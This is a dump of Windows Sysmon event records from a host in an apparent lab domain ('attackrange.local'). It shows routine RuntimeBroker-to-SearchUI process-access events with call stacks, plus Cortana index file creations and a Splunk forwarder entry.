12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246004C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246004C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000007117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFA8572BD980642377553A27A7D2A295,SHA256=D6328B2B2B3346D6B48618F5C162B4E5862EEF179554F6234E9BBDFE3AF004B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.944{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.944{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.929{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bc4b|C:\Windows\System32\Windows.Storage.dll+12db23|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.929{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bbe8|C:\Windows\System32\Windows.Storage.dll+12db04|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.929{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12cd6b|C:\Windows\System32\Windows.Storage.dll+12c245|C:\Windows\System32\Windows.Storage.dll+12c022|C:\Windows\System32\Windows.Storage.dll+12f28a|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60e40|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+5fb52|C:\Windows\System32\Windows.Storage.dll+60148|C:\Windows\System32\Windows.Storage.dll+19f723|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+19f828|C:\Windows\System32\Windows.Storage.dll+19f709|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x80000000000000007107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x80000000000000007106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.898{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{739803e1-6d06-4151-9294-82b30eaaf3d4}\0.2.filtertrie.intermediate.txt2021-03-31 12:02:31.898 11241100x80000000000000007105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.898{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{739803e1-6d06-4151-9294-82b30eaaf3d4}\0.1.filtertrie.intermediate.txt2021-03-31 12:02:31.898 11241100x80000000000000007104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.898{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{739803e1-6d06-4151-9294-82b30eaaf3d4}\0.0.filtertrie.intermediate.txt2021-03-31 12:02:31.898 11241100x80000000000000007103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\Appssynonyms.txt2016-04-15 08:09:24.000 